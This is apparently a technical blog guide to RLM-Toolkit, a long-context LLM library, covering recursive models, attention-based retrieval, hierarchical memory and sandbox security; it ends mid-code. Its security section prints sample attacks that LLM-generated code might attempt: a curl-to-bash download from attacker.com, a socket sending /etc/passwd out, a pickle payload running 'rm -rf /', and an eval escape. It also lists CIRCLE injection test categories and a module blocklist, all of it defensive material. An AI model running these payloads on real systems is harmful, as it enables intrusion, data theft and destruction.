- BrainTools - https://www.braintools.ru -
From theory to production: architecture, algorithms, security
This is a comprehensive guide to RLM-Toolkit, an open-source library for working with contexts of arbitrary length.
What I will cover:
- Formal theory of RLM (state machine, recursion)
- InfiniRetri: the mathematics [1] of attention-based retrieval
- H-MEM: a cognitive memory [2] architecture
- RAG vs KAG vs GraphRAG vs InfiniRetri
- Security: CIRCLE compliance, sandbox escape prevention
- Real examples with execution logs
- Troubleshooting and best practices
Level: from mid-level developers to PhD-level research.
🚀 v1.0.1 was released yesterday: already 200+ unique downloads in less than a day!
pip install rlm-toolkit
On the roadmap: integration with NVIDIA KVzap for hardware-accelerated KV-cache compression.
| Model | Context | Effective | Decay λ | Source |
|---|---|---|---|---|
| GPT-4o | 128K | ~80K | 0.012 | OpenAI |
| GPT-OSS-120B | 128K | ~100K | 0.010 | OpenAI |
| Claude Sonnet 4.5 | 200K | ~150K | 0.010 | Anthropic |
| Claude Opus 4.5 | 200K | ~180K | 0.008 | Anthropic |
| Gemini 3 Pro | 2M | ~1.5M | 0.003 | |
| Gemini 3 Flash | 1M | ~800K | 0.004 | |
| Llama 4 Scout | 10M | ~8M | 0.001 | Meta |
| Qwen3-235B | 128K | ~100K | 0.011 | Alibaba |
Quality(c) = Q₀ × e^(-λc) + ε
where:
Q₀ = baseline model quality (as c → 0)
λ = decay coefficient (model-specific)
c = context length in tokens
ε = noise (hallucination baseline)
Why model the decay as exponential? Self-attention in transformers scales as O(n²). As the context grows:
- Attention weights are spread over a larger number of tokens
- Important information "drowns" in the mass
- Positional encoding loses precision at distant positions
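The decay model above can be evaluated directly. The sketch below is illustrative only: the article does not state the unit in which λ is calibrated, so the code assumes that c is expressed in thousands of tokens (with c in raw tokens, the tabulated λ values would drive the exponential to zero almost immediately). The function names `quality` and `half_life_k` are hypothetical and are not part of RLM-Toolkit.

```python
import math


def quality(context_k: float, q0: float, decay: float, noise: float = 0.0) -> float:
    """Quality(c) = Q0 * exp(-decay * c) + noise.

    Assumption: context_k is the context length in THOUSANDS of tokens.
    """
    return q0 * math.exp(-decay * context_k) + noise


def half_life_k(decay: float) -> float:
    """Context length (in thousands of tokens) at which the decaying term halves."""
    return math.log(2) / decay


# Example with the decay value listed for GPT-4o (0.012) and Q0 normalized to 1.0
for c in (8, 32, 128):
    print(f"{c}K tokens -> {quality(c, q0=1.0, decay=0.012):.3f}")
print(f"half-life: {half_life_k(0.012):.1f}K tokens")
```

Under this unit assumption the half-life is simply ln 2 / λ, which gives a quick way to compare the models in the table.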
Tests on OOLONG-Pairs (arxiv:2512.24601):
| Context | NIAH (simple) | OOLONG-Pairs (hard) |
|---|---|---|
| 8K | 98% | 72% |
| 32K | 97% | 58% |
| 128K | 95% | 31% |
| 512K | 91% | 8% |
| 1M | 89% | <0.1% 😱 |
OOLONG-Pairs is a task of comparing pairs of entities scattered across a document. It requires global understanding rather than local search.
Chunking:
chunks = split(document, size=100_000)
results = [llm.analyze(chunk) for chunk in chunks]
final = merge(results)
# ❌ PROBLEM: cross-chunk references are lost
# If fact A is in chunk 1 and fact B is in chunk 5, the link is never found
Summarization:
summary = llm.summarize(document)  # 10M → 10K
answer = llm.query(summary, question)
# ❌ PROBLEM: details are lost irreversibly
# "The contract has 847 clauses" → "A detailed contract"
RAG:
relevant = vectordb.search(query, k=10)
answer = llm.generate(query, relevant)
# ❌ PROBLEM: semantic similarity ≠ relevance
# "Find contradictions": which embedding should be searched for?
"Long prompts should not be fed into the neural network directly. They should be part of the environment that the LLM interacts with symbolically"
(Zhang, Kraska, Khattab, arxiv:2512.24601)
┌────────────────────────────────────────────────────────────────┐
│ RLM ARCHITECTURE │
├────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ INPUT LAYER │ │
│ │ context = "10M tokens..." query = "Find bugs" │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ REPL ENVIRONMENT (Python) │ │
│ │ Variables: {context, vars, history} │ │
│ │ Functions: {llm_query, FINAL, FINAL_VAR} │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ ROOT LLM (Controller) │ │
│ │ Generates Python code to analyze context │ │
│ │ Makes decisions about sub-calls │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ ↓ │
│ ┌─────────────────┐ ┌─────────────────────────┐ │
│ │ CODE EXECUTOR │ │ SUB-LLM CALLS │ │
│ │ (Sandboxed) │ │ llm_query(prompt) │ │
│ │ AST validation │ │ depth++, budget-- │ │
│ └─────────────────┘ └─────────────────────────┘ │
│ ↓ ↓ │
│ ┌──────────────────────────────────────────────────────────┐ │
│ │ STATE UPDATE │ │
│ │ vars.update(new_vars) │ │
│ │ history.append(output) │ │
│ └──────────────────────────────────────────────────────────┘ │
│ ↓ │
│ FINAL(answer) → OUTPUT │
│ │
└────────────────────────────────────────────────────────────────┘
Definition 1. A Recursive Language Model (RLM) is a tuple (L, E, R, S, δ, F) where:
L : Language Model (root LLM)
E : Execution Environment (Python REPL)
R : Recursive mechanism (llm_query function)
S : State space = {context, vars, history, depth, cost}
δ : Transition function S × Action → S
F : Termination predicate (FINAL detected)
State = (context: str, vars: Dict, history: List, depth: int, cost: float)
Actions:
  - CODE(c)     : Execute code c, update vars
  - QUERY(p)    : Call sub-LLM with prompt p, depth++
  - FINAL(x)    : Terminate with output x
  - FINAL_VAR(v): Terminate with vars[v]
Transitions:
  S₀ = (P, {}, [], 0, 0.0)  # Initial state
  δ(S, CODE(c)):
    output = execute(c, S.vars)
    return S with {
      vars = S.vars ∪ new_vars(output),
      history = S.history + [output]
    }
  δ(S, QUERY(p)):
    result = sub_llm.generate(p)
    return S with {
      vars = S.vars ∪ {"last_query": result},
      history = S.history + [result],
      depth = S.depth + 1,
      cost = S.cost + query_cost(p, result)
    }
  δ(S, FINAL(x)):
    HALT with output x
- Context Never Loaded: context exists as a variable but is never fed to the LLM in full
- Depth Bounded: depth ≤ max_depth (typically 2-3)
- Cost Bounded: cost ≤ max_cost (budget in USD)
- Termination Guaranteed: either FINAL or max_iterations
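The transition function and the two resource bounds can be sketched as plain Python. This is a minimal illustration of the formal definition, not the library's implementation: the names `State`, `apply_code`, `apply_query`, `MAX_DEPTH` and `MAX_COST` are hypothetical, and the bound values are assumptions chosen for the example.

```python
from dataclasses import dataclass, field, replace

MAX_DEPTH = 3   # assumed bound; the article says "typically 2-3"
MAX_COST = 5.0  # assumed budget in USD


@dataclass(frozen=True)
class State:
    context: str
    vars: dict = field(default_factory=dict)
    history: tuple = ()
    depth: int = 0
    cost: float = 0.0


def apply_code(state: State, new_vars: dict, output: str) -> State:
    """delta(S, CODE(c)): merge new variables and record the output."""
    return replace(
        state,
        vars={**state.vars, **new_vars},
        history=state.history + (output,),
    )


def apply_query(state: State, result: str, query_cost: float) -> State:
    """delta(S, QUERY(p)): record the sub-LLM result, enforcing both bounds."""
    if state.depth + 1 > MAX_DEPTH:
        raise RuntimeError("depth bound exceeded")
    if state.cost + query_cost > MAX_COST:
        raise RuntimeError("cost bound exceeded")
    return replace(
        state,
        vars={**state.vars, "last_query": result},
        history=state.history + (result,),
        depth=state.depth + 1,
        cost=state.cost + query_cost,
    )


s0 = State(context="P")
s1 = apply_code(s0, {"n_files": 47}, "Found 47 files")
s2 = apply_query(s1, "File 3: VULNERABLE", query_cost=0.25)
print(s2.depth, s2.cost, len(s2.history))
```

Each transition returns a new immutable state, which keeps the execution history easy to log and replay. Note that `context` is carried through every transition unchanged and is never passed to a model call.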
# Query: "Find all SQL injections in the code"
# Iteration 1: Root LLM generates code
"""
sections = context.split("\n\n# FILE:")
print(f"Found {len(sections)} files")
sql_patterns = ["execute(", "cursor.execute", "raw("]
suspicious = []
for i, section in enumerate(sections):
    if any(p in section for p in sql_patterns):
        suspicious.append(i)
print(f"Suspicious files: {suspicious}")
"""
# Output: "Found 47 files\nSuspicious files: [3, 12, 29, 45]"
# Iteration 2: Deep analysis via sub-LLM
"""
for idx in suspicious[:3]:  # Analyze first 3
    file_content = sections[idx][:8000]  # Truncate for sub-call
    analysis = llm_query(f'''
    Analyze this code for SQL injection vulnerabilities:
    {file_content}
    ''')
    print(f"File {idx}: {analysis}")
"""
# Output: "File 3: VULNERABLE - unsanitized user input at line 42..."
# Iteration 3: Compile results
"""
vulnerabilities = [
    {"file": 3, "line": 42, "type": "SQL Injection"},
    {"file": 12, "line": 87, "type": "SQL Injection"},
    # ...
]
FINAL_VAR(vulnerabilities)
"""
Query: "Find all mentions of the deadline"
Vector Search:
1. Embed query → q_vec
2. For each chunk: similarity(q_vec, chunk_vec)
3. Return top-k
PROBLEM: a "deadline" may be phrased as:
- "the due date"
- "by January 15"
- "no later than the first quarter"
Vector similarity does NOT reliably capture such implicit references!
The idea: use the LLM's internal attention weights as a relevance signal.
The LLM already "knows" which tokens to pay attention [14] to in order to answer the question. We simply extract this information.
def infiniretri(context: str, question: str, model: LLM) -> str:
    """
    Attention-Based Infinite Context Retrieval
    Based on arxiv:2502.12962
    """
    # Step 1: Chunk context into segments
    segments = chunk(context, size=SEGMENT_SIZE)  # e.g., 8K tokens each
    # Step 2: Initialize historical context
    historical_context = ""
    # Step 3: Iterative processing (like human reading)
    for segment in segments:
        # Combine historical context + current segment
        combined = historical_context + segment
        # Run model with question to get attention
        output, attention_weights = model.forward_with_attention(
            prompt=f"Context: {combined}\n\nQuestion: {question}"
        )
        # Step 4: Attention-based retrieval
        # Average attention across layers and heads
        avg_attention = attention_weights.mean(dim=[0, 1])  # [seq_len]
        # Find tokens with highest attention, restored to document order
        top_indices = sorted(avg_attention.topk(k=TOP_K).indices.tolist())
        # Step 5: Update historical context
        # Keep only high-attention tokens from combined
        # (pseudocode: `combined` is treated as a token sequence here)
        relevant_tokens = [combined[i] for i in top_indices]
        historical_context = "".join(relevant_tokens)
    # Step 6: Final answer with preserved context
    return model.generate(
        f"Context: {historical_context}\n\nQuestion: {question}\n\nAnswer:"
    )
Attention Score Aggregation:
A_final = (1/L) × Σ_{l=1}^{L} (1/H) × Σ_{h=1}^{H} A_{l,h}
where:
L = number of layers
H = number of heads per layer
A_{l,h} = attention matrix at layer l, head h
Token Importance Score:
importance(t) = Σ_{q ∈ query_tokens} A_final[q, t]
Tokens with high importance are kept in the historical context.
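The two formulas can be checked on a toy example. The sketch below uses plain nested lists instead of tensors so that it runs without dependencies; it assumes the attention input is indexed as `attn[layer][head][query_pos][token_pos]`, and all function names are hypothetical rather than part of RLM-Toolkit or the InfiniRetri reference code.

```python
def aggregate_attention(attn):
    """A_final[q][t]: mean of attn[l][h][q][t] over all layers l and heads h."""
    n_layers, n_heads = len(attn), len(attn[0])
    seq = len(attn[0][0])
    a_final = [[0.0] * seq for _ in range(seq)]
    for layer in attn:
        for head in layer:
            for q in range(seq):
                for t in range(seq):
                    a_final[q][t] += head[q][t] / (n_layers * n_heads)
    return a_final


def token_importance(a_final, query_positions):
    """importance(t): attention that token t receives, summed over the query tokens."""
    seq = len(a_final)
    return [sum(a_final[q][t] for q in query_positions) for t in range(seq)]


def top_k_tokens(importance, k):
    """Indices of the k most important tokens, returned in document order."""
    ranked = sorted(range(len(importance)), key=lambda t: importance[t], reverse=True)
    return sorted(ranked[:k])


# Toy input: 2 layers x 2 heads, sequence of 4 tokens; positions 2 and 3 are the question
head = [
    [0.0, 0.0, 0.0, 0.0],
    [0.0, 0.0, 0.0, 0.0],
    [0.5, 0.25, 0.125, 0.0],
    [0.0, 0.5, 0.25, 0.25],
]
attn = [[head, head], [head, head]]
a_final = aggregate_attention(attn)
importance = token_importance(a_final, query_positions=[2, 3])
print(importance)
print(top_k_tokens(importance, k=2))
```

Returning the selected indices in document order matters: the retained tokens are concatenated into the historical context, so shuffling them would scramble the text the model sees in the next iteration.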
| Benchmark | Baseline LLM | + RAG | + InfiniRetri |
|---|---|---|---|
| NIAH @1M | 23% | 61% | 100% |
| LongBench | 31% | 51% | 89% (+288%) |
| SCROLLS | 44% | 58% | 82% |
| Quality | 29% | 47% | 71% |
from rlm_toolkit.retrieval import InfiniRetriever
# Initialize with small model for efficiency (default: Qwen2.5-0.5B)
retriever = InfiniRetriever(
    model_name_or_path="Qwen/Qwen2.5-0.5B-Instruct",
)
# Load massive document
with open("codebase_1m_tokens.txt") as f:
    huge_doc = f.read()
# Retrieve with 100% accuracy
answer = retriever.retrieve(
    context=huge_doc,
    question="In which function is SecurityEngine defined?"
)
print(answer)
# Output: "SecurityEngine is defined in engines/base.py,
# function create_engine() at line 142"
| Aspect | RAG | KAG | GraphRAG | InfiniRetri |
|---|---|---|---|---|
| Approach | Vector similarity | Knowledge Graph | Community detection | Attention-based |
| Indexing | Embedding + VectorDB | Entity extraction + Graph | Summarization + Leiden | None (runtime) |
| Indexing time | Minutes | Hours | Hours | 0 |
| Requirements | Embedding model | Graph DB + LLM | LLM + lots of $$ | Attention access |
| Global context | ❌ | ✅ | ✅ | ✅ |
| Exact search | ~70% | ~85% | ~80% | 100% |
| Cost | $ | $$$ | $$$$ | $ |
| Open Source | ✅ | ✅ | ✅ | ✅ |
┌─────────────────────────────────────────────────────────────────┐
│ DECISION TREE │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Context < 50K tokens? │
│ └─ YES → Standard RAG (cheap, simple) │
│ └─ NO ↓ │
│ │
│ Need structured relationships? │
│ └─ YES → KAG (medicine, law, finance) │
│ └─ NO ↓ │
│ │
│ Need a global overview of a large corpus? │
│ └─ YES → GraphRAG (research, due diligence) │
│ └─ NO ↓ │
│ │
│ Is retrieval precision critical? │
│ └─ YES → InfiniRetri (code, legal, security) │
│ └─ NO ↓ │
│ │
│ Context > 500K tokens? │
│ └─ YES → RLM + InfiniRetri │
│ └─ NO → RAG is sufficient │
│ │
└─────────────────────────────────────────────────────────────────┘
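The decision tree translates directly into a small function. The sketch below mirrors the branches in order; the function name `choose_retrieval` and its parameter names are hypothetical and exist only for illustration.

```python
def choose_retrieval(
    context_tokens: int,
    needs_structured_relations: bool = False,
    needs_global_overview: bool = False,
    precision_critical: bool = False,
) -> str:
    """Walk the decision tree from top to bottom and return the suggested method."""
    if context_tokens < 50_000:
        return "RAG"
    if needs_structured_relations:
        return "KAG"
    if needs_global_overview:
        return "GraphRAG"
    if precision_critical:
        return "InfiniRetri"
    if context_tokens > 500_000:
        return "RLM + InfiniRetri"
    return "RAG"


print(choose_retrieval(30_000, precision_critical=True))
print(choose_retrieval(200_000, precision_critical=True))
print(choose_retrieval(2_000_000))
```

Because the size check comes first, a small context is routed to plain RAG even when precision is flagged as critical, exactly as in the tree.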
RAG + InfiniRetri (Hybrid Retrieval):
from rlm_toolkit.retrieval import HybridRetriever, VectorRetriever, InfiniRetriever
hybrid = HybridRetriever(
    retrievers=[
        VectorRetriever(model="BAAI/bge-m3", weight=0.3),
        InfiniRetriever(model="Qwen/Qwen3-0.6B", weight=0.7),
    ],
    fusion="reciprocal_rank"  # RRF fusion
)
# Fast vector pre-filter + precise attention refinement
results = hybrid.retrieve(context, question)
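For readers unfamiliar with reciprocal rank fusion, here is a minimal weighted variant. It is a sketch of the general technique, not of how `HybridRetriever` is implemented internally: the function name is hypothetical, the smoothing constant k=60 is the value commonly used for RRF, and applying the per-retriever weights as multipliers is an assumption.

```python
def reciprocal_rank_fusion(rankings, weights, k=60):
    """Fuse ranked lists: score(d) = sum_i weight_i / (k + rank_i(d)).

    rankings: list of ranked document-id lists, best first.
    weights:  one weight per ranking (assumed multiplicative).
    """
    scores = {}
    for ranking, weight in zip(rankings, weights):
        for rank, doc in enumerate(ranking, start=1):
            scores[doc] = scores.get(doc, 0.0) + weight / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)


vector_hits = ["a", "b", "c"]     # hypothetical output of a vector retriever
attention_hits = ["c", "a", "d"]  # hypothetical output of an attention-based retriever
fused = reciprocal_rank_fusion([vector_hits, attention_hits], weights=[0.3, 0.7])
print(fused)
```

RRF works on ranks rather than raw scores, so the two retrievers do not need comparable score scales. A document that appears in both lists accumulates score from each.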
KAG + InfiniRetri (Graph-Enhanced):
from rlm_toolkit.retrieval import KAGRetriever, InfiniRetriever
# Step 1: KAG finds relevant entities
kag = KAGRetriever(graph_db="neo4j://localhost:7687")
entities = kag.query("All contracts with Gazprom")
# Step 2: InfiniRetri finds exact mentions
infini = InfiniRetriever("Qwen/Qwen3-0.6B")
for entity in entities:
    details = infini.retrieve(
        context=full_document,
        question=f"Details about {entity.name}"
    )
| Method | Indexing | Query | Total (100 queries) |
|---|---|---|---|
| RAG (OpenAI) | $0.13 | $0.02 | $2.13 |
| KAG (GPT-4o) | $15.00 | $0.50 | $65.00 |
| GraphRAG | $50.00 | $0.10 | $60.00 |
| InfiniRetri | $0.00 | $0.05 | $5.00 |
| RLM + InfiniRetri | $0.00 | $0.30 | $30.00 |
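The totals in the table follow from total = indexing + per-query cost × number of queries. The sketch below reproduces them and adds a break-even calculation; the figures are copied from the table, while the helper names are hypothetical.

```python
# (indexing cost, cost per query) in USD, copied from the table above
COSTS = {
    "RAG (OpenAI)": (0.13, 0.02),
    "KAG (GPT-4o)": (15.00, 0.50),
    "GraphRAG": (50.00, 0.10),
    "InfiniRetri": (0.00, 0.05),
    "RLM + InfiniRetri": (0.00, 0.30),
}


def total_cost(method: str, n_queries: int) -> float:
    """One-off indexing cost plus per-query cost for n_queries queries."""
    index_cost, per_query = COSTS[method]
    return index_cost + per_query * n_queries


def break_even_queries(a: str, b: str) -> float:
    """Number of queries at which methods a and b cost the same."""
    index_a, query_a = COSTS[a]
    index_b, query_b = COSTS[b]
    return (index_a - index_b) / (query_b - query_a)


for name in COSTS:
    print(f"{name}: ${total_cost(name, 100):.2f}")
print(f"RAG vs InfiniRetri break-even: {break_even_queries('RAG (OpenAI)', 'InfiniRetri'):.1f} queries")
```

With these figures, a zero-indexing method is only cheaper than RAG for the first handful of queries. After that, RAG's lower per-query price dominates, so the cost argument depends heavily on how often the same corpus is queried.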
# LangChain ConversationBufferMemory
class BufferMemory:
    def __init__(self, max_tokens=4000):
        self.buffer = []
        self.max_tokens = max_tokens

    def add(self, message):
        self.buffer.append(message)
        # FIFO eviction
        while token_count(self.buffer) > self.max_tokens:
            self.buffer.pop(0)  # ❌ Old = lost forever
Problems:
- FIFO eviction: important old messages are removed before unimportant new ones
- No abstraction: "yesterday we discussed Python" and fine details sit at the same level
- No links: conversations are isolated
H-MEM is based on Complementary Learning Systems (CLS) theory:
HIPPOCAMPUS (fast memorization)
↓ consolidation
NEOCORTEX (long-term storage, abstractions)
The 4 levels of H-MEM:
┌─────────────────────────────────────────────────────────────────┐
│ LEVEL 3: DOMAIN │
│ "The user is a developer interested in AI Security" │
│ Changes very rarely, high abstraction │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 2: CATEGORY │
│ "Topic: weather", "Topic: code", "Topic: documentation" │
│ Semantic clusters │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 1: TRACE │
│ "Discussed the weather in Moscow and St. Petersburg, prefers +20°C" │
│ Consolidated memories │
├─────────────────────────────────────────────────────────────────┤
│ LEVEL 0: EPISODE │
│ "User: what's the weather?" "AI: +15°C, cloudy" │
│ Raw interactions │
└─────────────────────────────────────────────────────────────────┘
# Assumed import: the article does not show where HDBSCAN and KMeans come from
from sklearn.cluster import HDBSCAN, KMeans  # HDBSCAN needs scikit-learn >= 1.3

class HierarchicalMemory:
    def consolidate(self):
        """
        Memory consolidation: Episodes → Traces → Categories → Domains
        """
        # Step 1: Cluster episodes by semantic similarity
        episode_embeddings = self.embed(self.episodes)
        clusters = HDBSCAN(min_cluster_size=3).fit(episode_embeddings)
        # Step 2: Create traces via LLM summarization
        for cluster_id in set(clusters.labels_):
            if cluster_id == -1:  # Noise
                continue
            cluster_episodes = [
                self.episodes[i]
                for i, c in enumerate(clusters.labels_)
                if c == cluster_id
            ]
            trace = self.llm.summarize(
                f"Summarize these interactions:\n{cluster_episodes}"
            )
            self.traces.append(Trace(
                content=trace,
                source_episodes=cluster_episodes,
                timestamp=now()
            ))
        # Step 3: Cluster traces → categories
        if len(self.traces) >= 5:
            trace_embeddings = self.embed([t.content for t in self.traces])
            # The model must be fitted before labels_ is available
            trace_clusters = KMeans(
                n_clusters=min(5, len(self.traces) // 3)
            ).fit(trace_embeddings)
            for cluster_id in range(trace_clusters.n_clusters):
                cluster_traces = [
                    self.traces[i]
                    for i, c in enumerate(trace_clusters.labels_)
                    if c == cluster_id
                ]
                category = self.llm.summarize(
                    f"What category do these belong to?\n{cluster_traces}"
                )
                self.categories.append(Category(content=category))
        # Step 4: Update domain (rarely)
        if len(self.categories) >= 3 and self._should_update_domain():
            self.domain = self.llm.generate(
                f"Based on categories {self.categories}, "
                f"describe the user's overall interests and profile."
            )
What if new information contradicts old information?
def add_episode_with_conflict_check(self, new_episode: str):
    """
    Check for conflicts and update memories accordingly.
    """
    # Find potentially conflicting memories
    similar = self.retrieve(new_episode, k=5)
    for memory in similar:
        conflict = self.llm.check_conflict(
            f"Old: {memory.content}\nNew: {new_episode}"
        )
        if conflict.is_conflict:
            if conflict.new_supersedes:
                # Update old memory
                memory.content = self.llm.merge(
                    f"Update '{memory.content}' with '{new_episode}'"
                )
                memory.updated_at = now()
            else:
                # Flag for human review
                self.conflicts.append(Conflict(old=memory, new=new_episode))
    self.episodes.append(Episode(content=new_episode))
import os
from rlm_toolkit.memory import SecureHierarchicalMemory
from rlm_toolkit.crypto import AES256GCM
# Create encrypted memory with trust zones
smem = SecureHierarchicalMemory(
    agent_id="agent-financial",
    trust_zone="confidential",
    encryption=AES256GCM(key=os.environ["HMEM_KEY"]),
)
# Add sensitive data (encrypted at rest)
smem.add_episode("Client SSN: 123-45-6789")  # Encrypted!
# Other agents cannot access
other_agent = SecureHierarchicalMemory(agent_id="agent-public")
try:
    other_agent.retrieve("SSN")  # ❌ AccessDenied
except AccessDenied:
    pass
# Grant explicit access
smem.grant_access("agent-compliance", "confidential")
compliance_agent = SecureHierarchicalMemory(agent_id="agent-compliance")
compliance_agent.retrieve("SSN")  # ✅ Works
The LLM generates its own tasks → solves them → improves. No labeled data, no human feedback.
Based on:
- R-Zero (arxiv:2508.05004): Challenger-Solver co-evolution
- REBASE (arxiv:2512.29379): experience replay with scoring
┌─────────────────────────────────────────────────────────────────┐
│ R-ZERO LOOP │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌───────────────┐ ┌───────────────┐ │
│ │ CHALLENGER │ ──────→ │ SOLVER │ │
│ │ Generates │ │ Attempts │ │
│ │ hard tasks │ │ to solve │ │
│ └───────────────┘ └───────────────┘ │
│ ↑ │ │
│ │ ↓ │
│ │ ┌───────────────┐ │
│ │ │ VERIFIER │ │
│ │ │ Checks if │ │
│ │ │ correct │ │
│ │ └───────────────┘ │
│ │ │ │
│ │ ┌─────────────┴─────────────┐ │
│ │ ↓ ↓ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ CORRECT │ │ WRONG │ │
│ │ │ +reward │ │ -reward │ │
│ │ └──────────┘ └──────────┘ │
│ │ │ │ │
│ │ └───────────┬───────────────┘ │
│ │ ↓ │
│ │ ┌─────────────────┐ │
│ └───────────── │ EVOLUTION POOL │ │
│ │ Best strategies │ │
│ └─────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
from rlm_toolkit.evolve import SelfEvolvingRLM, EvolutionStrategy
from rlm_toolkit.providers import OllamaProvider
# Initialize
evolve = SelfEvolvingRLM(
    provider=OllamaProvider("llama4-scout:17b"),
    strategy=EvolutionStrategy.CHALLENGER_SOLVER,
    config={
        "challenge_diversity": 0.8,  # How different each challenge is
        "difficulty_ramp": 0.1,  # How fast difficulty increases
        "memory_size": 1000,  # Experience buffer size
    }
)
# Single solve with self-refinement
answer = evolve.solve("Prove that √2 is irrational")
print(f"Answer: {answer.answer}")
print(f"Confidence: {answer.confidence}")
print(f"Iterations: {answer.iterations}")
# Training loop (improves over time)
metrics = evolve.training_loop(
    iterations=100,
    domain="math",
    difficulty="hard",
    save_checkpoint=True,
)
print(f"Initial success rate: {metrics.initial_rate}")  # e.g., 65%
print(f"Final success rate: {metrics.final_rate}")  # e.g., 89%
print(f"Best strategies: {metrics.top_strategies}")
from rlm_toolkit.evolve import REBASE
rebase = REBASE(
    provider=OllamaProvider("llama4-scout:109b"),
    scorer="outcome",  # Score by final outcome
)
# Collect experiences
for task in tasks:
    trajectory = rebase.solve_with_trajectory(task)
    rebase.add_experience(trajectory)
# Train on best experiences
improved = rebase.train(
    epochs=10,
    batch_size=32,
    top_k_ratio=0.2,  # Use top 20% trajectories
)
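The `top_k_ratio=0.2` setting suggests that only the best-scoring fifth of the collected trajectories is used for training. A minimal sketch of such a selection step follows. It assumes that each trajectory carries a numeric score and represents it as a plain dict; both the helper name and the data layout are hypothetical and say nothing about how `REBASE.train` is implemented.

```python
def select_top_trajectories(trajectories, top_k_ratio=0.2):
    """Keep the best-scoring fraction of trajectories (at least one)."""
    if not trajectories:
        return []
    keep = max(1, int(len(trajectories) * top_k_ratio))
    ranked = sorted(trajectories, key=lambda t: t["score"], reverse=True)
    return ranked[:keep]


# Hypothetical experience buffer: ten trajectories with scores 0..9
buffer = [{"task": f"task-{i}", "score": float(i)} for i in range(10)]
best = select_top_trajectories(buffer, top_k_ratio=0.2)
print([t["task"] for t in best])
```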
# The LLM may generate:
# 1. RCE via subprocess
import subprocess
subprocess.run(["curl", "attacker.com/shell.sh", "|", "bash"])
# 2. Data exfiltration via network
import socket
s = socket.socket()
s.connect(("attacker.com", 4444))
s.send(open("/etc/passwd").read().encode())
# 3. Pickle RCE
import os
import pickle
class Exploit:
    def __reduce__(self):
        return (os.system, ("rm -rf /",))
pickle.loads(pickle.dumps(Exploit()))
# 4. Builtins escape
eval("__import__('os').system('whoami')")
CIRCLE = Code Injection for RLM via Crafted Linguistic Exploits
It tests 7 categories of attacks:
- Direct code injection
- Obfuscated code injection
- Indirect injection via context
- Memory corruption attempts
- Privilege escalation
- Data exfiltration
- Denial of service
┌─────────────────────────────────────────────────────────────────┐
│ SECURITY LAYERS │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Layer 1: AST STATIC ANALYSIS │
│ ───────────────────────────── │
│ Before execution, parse code to AST and check: │
│ - Import statements against blocklist │
│ - Function calls against dangerous patterns │
│ - Attribute access (__builtins__, __globals__) │
│ │
│ Layer 2: IMPORT BLOCKLIST (38 modules) │
│ ───────────────────────────────────── │
│ os, sys, subprocess, shutil, pathlib, │
│ socket, http, urllib, ftplib, telnetlib, requests, │
│ pickle, shelve, dill, cloudpickle, marshal, │
│ ctypes, cffi, multiprocessing, threading, │
│ code, codeop, pty, tty, termios, │
│ tempfile, glob, fnmatch, webbrowser, platform, │
│ asyncio (subprocess), importlib, builtins │
│ │
│ Layer 3: SANDBOXED EXECUTION │
│ ───────────────────────────── │
│ - Restricted builtins (no eval, exec, compile, open) │
│ - Timeout enforcement (default 30s) │
│ - Memory limit (default 512MB) │
│ - Virtual filesystem with quotas │
│ │
│ Layer 4: OUTPUT SANITIZATION │
│ ───────────────────────────── │
│ - Truncate output to prevent context overflow │
│ - Scan for sensitive data patterns (API keys, passwords) │
│ - Redact before returning to user │
│ │
└─────────────────────────────────────────────────────────────────┘
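Layer 1 can be illustrated with Python's standard `ast` module. The sketch below is a simplified stand-in, not RLM-Toolkit's validator: the blocklists are abbreviated, and the function name `find_violations` and the exact set of checks are assumptions. A static check of this kind is easy to bypass on its own, which is why the diagram pairs it with a restricted runtime.

```python
import ast

# Abbreviated, illustrative blocklists (the article's full list is longer)
BLOCKED_MODULES = {"os", "sys", "subprocess", "socket", "pickle", "ctypes", "importlib", "builtins"}
BLOCKED_CALLS = {"eval", "exec", "compile", "open", "__import__"}


def find_violations(source: str) -> list[str]:
    """Parse source to an AST and report blocked imports, calls and dunder access."""
    violations = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in BLOCKED_MODULES:
                    violations.append(f"import {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in BLOCKED_MODULES:
                violations.append(f"from {node.module} import ...")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BLOCKED_CALLS:
                violations.append(f"call {node.func.id}()")
        elif isinstance(node, ast.Attribute):
            if node.attr.startswith("__") and node.attr.endswith("__"):
                violations.append(f"attribute {node.attr}")
    return violations


print(find_violations("import subprocess"))
print(find_violations("eval(\"__import__('os').system('whoami')\")"))
print(find_violations("total = sum([1, 2, 3])"))
```

The second example is flagged because of the `eval` call itself. The payload inside the string is never parsed, which shows why the call has to be blocked rather than its argument inspected.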
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
# Maximum security configuration
config = RLMConfig(
    security=SecurityConfig(
        sandbox=True,
        max_execution_time=30.0,
        max_memory_mb=512,
        blocked_imports="strict",  # All 38 modules
        allow_network=False,
        allow_filesystem=False,
        virtual_fs_quota_mb=100,
        redact_sensitive=True,
        sensitive_patterns=[
            r"[A-Za-z0-9]{32}",  # API keys
            r"password\s*[:=]",  # Passwords
            r"\d{3}-\d{2}-\d{4}",  # SSN
        ],
    )
)
rlm = RLM.from_ollama("llama4-scout:17b", config=config)
# This is now safe
result = rlm.run(untrusted_document, "Analyze this")
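To make the effect of `sensitive_patterns` concrete, here is a standalone redaction sketch using the standard `re` module. It does not show how RLM-Toolkit applies the patterns internally. The patterns are slight variants of the ones in the configuration (word boundaries added, and the password pattern extended to cover the value), and the `redact` helper is hypothetical.

```python
import re

# Variants of the configured patterns; the adjustments are assumptions for this example
SENSITIVE_PATTERNS = [
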